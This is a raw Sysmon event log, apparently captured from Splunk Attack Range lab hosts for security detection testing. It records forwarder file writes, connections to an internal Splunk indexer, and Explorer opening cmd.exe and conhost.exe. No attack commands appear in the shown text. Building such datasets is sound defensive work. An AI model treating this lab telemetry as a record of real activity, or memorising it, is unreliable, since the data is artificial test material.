10:40:24.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B742F9FB1FBD2018D6EB24ABF33F5A,SHA256=5316AC12E3592660231D15A420CC0D10EEC9FAFF9DBD9625F7DBB01A2C10405F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:25.973{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB5721E126CBF285700BE3D087A8265E,SHA256=3911F3D9CBC741478B923C5F7251D09F8B9E23758B0397D0277B0F86A2A12DD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:22.633{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51217-false10.0.1.12-8000- 23542300x8000000000000000214834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:25.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6883BCEFEE3C8178F4725B8866712A,SHA256=31A74DAD067A6F836BC239EBB1B71183C81D69DC0F292350DAB31C9B01D32D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:26.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78AF3EE29B812C01058B65962D093C7,SHA256=BC2A1B006DE18D64A9B20C50DC421B1622668057BC655FD898C3DF3D3C602626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:26.537{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B08D2716A23944D4AD562600A51CD679,SHA256=FC0AA3B56435D5752F5C61125C906D032796151EF3DFDD5144270BF27B682A54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:27.553{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED7332D34695BEC69011EDA6FB540114,SHA256=1458A4730F1C4512ED488C00EFAB6D6CC8141BEF6AD1BC59807BEB0B8EC72623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:28.553{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9BE75A3BA85C8FB061698D5EBCA573,SHA256=16170D0C2F10EB0A90C045D010A64738AA73CCB1B99E634B3231A36EC08B72A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:25.559{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53280-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:28.005{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=326812688088C4D0480DFD93B4277A07,SHA256=8E749E4807C6AE7B887C5C25CB955AC48D7964FD405F502BFBDCA4B79646C51D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:29.771{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3F5DEDA4E0BC80AB5412DF6964B8BD,SHA256=BE7AD081E065ABD46767DC273AB1074F0B2456DCF901CB9B08211CEA5FAE6458,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:29.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C1C276B787D48149027F96EEA634274,SHA256=BDFF7F5C4B3B0CEB20E86FBD676A050A8D8F50846D8548EC3C125F1232CE4ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:30.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61A2155C72CC356DC553B1E16B9145AF,SHA256=E9C810CA1F7C801DDDC574C516173261CCBCBA2954D32D73CF97BB6E8935B0DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:30.240{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E3946154422D18B94F95E240E159635B,SHA256=1E034AC9538C64725BF70D67380CC147D9E292A42361561EDE54EA2ED43726D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:31.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=923257FA438ABBD60DCB6FC06871FD79,SHA256=4FE6D061E85D4D1B39BAB846A5FDA7D128BFB7E53FD52630AE159C35557B0F31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:31.006{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3AACDD7E1539F6618DA399B7F4A0D9D,SHA256=776ECC86C5999CC9A8D310BB13F14F30BDF8CA251CB60C267FF65804F3933683,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:28.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51218-false10.0.1.12-8000- 23542300x8000000000000000214843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:32.053{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5CCF99FEA05D10E0318B10FDD744F7C,SHA256=F1FBE4B4506F8E11DFE9DDFF1EBB32C6D2B883131B666FA93DD48377BAFD52B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:32.239{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7946A0ECD1DFFAEEA0399C0A59025C6,SHA256=3C8933EFB23E8D672FE7397B679F0FD23EC4D52C3CB32E3AC97D04F6945072D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:33.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747E68BA631F8B290B9D4DF911B08340,SHA256=2535B6AF7F970C55D7E7B563B5D84F33C0A1895E0C94D94FE863CB57129FFEFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:31.590{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53281-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:33.755{C8EA50B7-F2AD-6215-C000-000000003802}4856ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:33.286{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=030F366F3201C22FC3F32FD4E264F305,SHA256=A09E542D37D386188E683EFFC1633518656F6390389C27E1A482C653D4E13F35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:33.270{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49283FF816CA7201312BD409612968A,SHA256=2F3C0CC02A22FB4FE5A1A1481A71923645F03B67687CB2AE87ABE68EB9922D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:34.240{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A56FB5575EA788251C1B6E368148F541,SHA256=9C06C763FDB99B25D930FDC38F15957FC08D84D6E373E1A9C496727AAEE6CF99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:34.380{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E6ADDC199605FF37A16B2A9FE973BF9,SHA256=0286B1E5FC2F2C3009943BB0C3AB0467B2974BF1AC947E46C0F0B0CE96284EC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.958{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.833{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:35.458{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5705BC725A4D073C7E341D75249182,SHA256=D510090DA8F9A384A7281EF6EABA1689A27972A05F22E5A1C648F013B4C4E9D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:35.256{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B1A6C9293E2FDC048769E9B52E3986D,SHA256=ACE986F21590B42E6CE9A66709722F25C6F75DEC24E5C18EFF0879B8B3C2C41B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:36.505{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D86092EABF2EC71439BB959D79E9A5B4,SHA256=99F489571DE9E835609EEDBED3F3819A98316CE61EF882AE0DE3E1D3434F60AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:36.271{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9726C8DD8463FF0D60287ADA3BEEB59E,SHA256=946DB35AB63F276AC2A1CB255B7103BCF5DFD5F97E073331577C42BF31CFFA54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:37.552{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D201C2F4D95D9F5935969D2010CF8C,SHA256=0E21E2892420C5A797F63276A8B4BC95F98862B44A59A02781CF450B77E985AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 